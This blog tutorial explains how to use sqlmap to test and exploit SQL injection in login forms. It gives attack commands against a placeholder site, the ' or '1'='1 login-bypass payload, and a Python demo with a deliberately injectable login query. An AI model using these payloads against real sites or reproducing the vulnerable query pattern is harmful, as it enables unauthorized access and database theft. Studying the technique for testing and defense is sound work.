Using sqlmap with login forms

By Silver Moon | April 15, 2013

In a previous article we saw how to use sqlmap to exploit vulnerable URLs of the form

http://www.site.com/section.php?id=59

where the id parameter, for example, is vulnerable to SQL injection.

Now we shall try to do the same thing with forms, especially login forms. Forms usually submit their data via POST, so the syntax of the sqlmap command is slightly different.

It's important to note that when working with POST submissions, the URL given to sqlmap must be the URL the form submits to (the form's action target), not the URL that loads the form.

So if the form is loaded on a url say

http://www.site.com/form.php

and it submits to the url

http://www.site.com/form_submit.php

Then the URL to use with sqlmap is http://www.site.com/form_submit.php

The other thing to find out is which parameters the form submits, and under what names. This is easily done with the DOM inspector in Chrome (the Network tab shows the exact POST body that is sent) or with Firebug in Firefox. sqlmap can also do this step for you: --forms makes it parse the forms on the page you give it and test their fields, and -r replays a raw request saved from a proxy such as Burp.

So let's say the injectable parameter is username. The command would be something like

$ python sqlmap.py -u "http://www.site.com/form_submit.php" --data="username=avc"

The --data option makes sqlmap send a POST request with that body. sqlmap tests every parameter in --data by default, so if the form also posts a password field, include it so the request looks like a real submission, and add -p username to test only that one parameter. Now if you are lucky, sqlmap will detect the SQL injection quickly. When working with forms and POST data, however, things usually don't move that quickly.

sqlmap may report the parameter as not injectable. Its default boolean-based blind test appends an always-true condition (AND 1=1) and an always-false condition (AND 1=2) to the parameter value and compares both responses with the original page: the parameter is injectable if the true request looks like the original and the false request looks different. That only proves anything if the original request already returns rows, i.e. produces a TRUE page. With an unknown username the login query matches nothing, so the baseline, the AND-true and the AND-false requests all return the same "login failed" page, and sqlmap has nothing to tell them apart.

However, we know that the parameter is injectable, because we can get inside just by using the magic word

' or '1'='1

If the first sqlmap command reports that the parameter is not injectable, try the magic word as the parameter value, so that the baseline request itself is the logged-in (TRUE) page:

$ python sqlmap.py -u "http://www.site.com/form_submit.php" --data="username=' or '1'='1"

This command should work if the magic word works from the browser: sqlmap's AND-false payload now turns the logged-in page back into the failed-login page, which is exactly the difference it is looking for. Two other options are worth knowing in this situation. --string tells sqlmap to judge TRUE and FALSE by a piece of text that appears only on the logged-in page (for example --string="Welcome", if that is the word your target's landing page uses) instead of by overall page similarity. --risk=3 adds the OR-based boolean payloads (' OR '1'='1 / ' OR '1'='2), which can flip a failed login into a successful one on their own and so do not need a TRUE baseline at all. One caveat: appending ' or '1'='1 to a field only logs you in if that OR ends up last in the WHERE clause. With the common shape WHERE username='...' AND password='...', AND binds tighter than OR, so the magic word has to go in the password field; whichever field it works in from the browser is the parameter to point sqlmap at.
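To make the TRUE-page requirement concrete, here is an added example that is not code from the original post or from sqlmap itself: a small Python stand-in for the vulnerable form_submit.php, backed by a constructed in-memory SQLite users table, plus a deliberately simplified imitation of sqlmap's boolean-based blind test (real sqlmap tries many more payload boundaries and uses a page-similarity ratio rather than exact equality). The query shape WHERE username='...' AND password='...', the user rows, and the "Welcome"/"Login failed" page texts are assumptions made for the example. It runs the situations described above: a dead baseline where the default AND test fails, the magic word as the value so the baseline is the logged-in page, the OR payload family with a --string-style marker, and the magic word in the username slot where the trailing AND keeps it from working.

```python
import sqlite3


def make_db():
    """Constructed sample users table standing in for the target site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    return conn


def login_page(conn, data):
    """Stand-in for form_submit.php.  Deliberately vulnerable: the POST fields are
    pasted straight into the SQL string, which is the bug sqlmap is pointed at.
    Returns the response body as text, the way sqlmap sees it."""
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (data["username"], data["password"]))
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        return "Database error"
    return "Welcome, %s" % rows[0][0] if rows else "Login failed"


def probe(conn, data, param, logic="AND", marker=None):
    """Simplified imitation of one sqlmap boolean-based blind test on the POST
    parameter `param`.

    logic="AND" is the payload family sqlmap tries by default; logic="OR" is the
    family it adds only with --risk=3.  With marker=None the TRUE and FALSE
    responses are compared against the baseline page (sqlmap's default); with a
    marker it behaves like --string: TRUE must contain the marker, FALSE must not.
    """
    baseline = login_page(conn, data)
    true_page = login_page(conn, dict(data, **{param: data[param] + "' %s '1'='1" % logic}))
    false_page = login_page(conn, dict(data, **{param: data[param] + "' %s '1'='2" % logic}))
    if marker is None:
        injectable = true_page == baseline and false_page != baseline
    else:
        injectable = marker in true_page and marker not in false_page
    return {"baseline": baseline, "true": true_page, "false": false_page,
            "injectable": injectable}


def demo():
    """Run the situations the article describes and return each verdict."""
    conn = make_db()
    dead = {"username": "avc", "password": "x"}             # unknown credentials
    magic = {"username": "avc", "password": "' or '1'='1"}  # magic word as the value
    magic_in_username = {"username": "' or '1'='1", "password": "x"}
    return {
        # Baseline is "Login failed"; AND-true and AND-false return that same
        # page, so the default test says "not injectable".
        "dead_baseline": probe(conn, dead, "password")["injectable"],
        # Baseline is now the logged-in page, so AND-false visibly changes it.
        "magic_baseline": probe(conn, magic, "password")["injectable"],
        # OR payloads judged by a --string-style marker need no TRUE baseline.
        "or_with_string": probe(conn, dead, "password", logic="OR",
                                marker="Welcome")["injectable"],
        # Magic word in the username slot: the trailing "AND password='x'" binds
        # tighter than the OR, so the baseline is still "Login failed".
        "username_slot": probe(conn, magic_in_username, "username")["injectable"],
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print("%-15s injectable=%s" % (name, verdict))
```

Running it prints one verdict per situation; the only one that comes out injectable without the magic word in the value is the OR family with a marker, which is why --risk=3 and --string are the first things to reach for when the plain --data run reports nothing.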

About Silver Moon

A Tech Enthusiast, Blogger, Linux Fan and a Software Developer. Writes about computer hardware, Linux and open source software, and coding in Python, PHP and JavaScript. He can be reached at [email protected].

2 Comments

  1. RobertGrey

    What if I have access to the phpmysql DB login and I want to scrape the database? I know the database.
    I just need to log in with user root and pw.
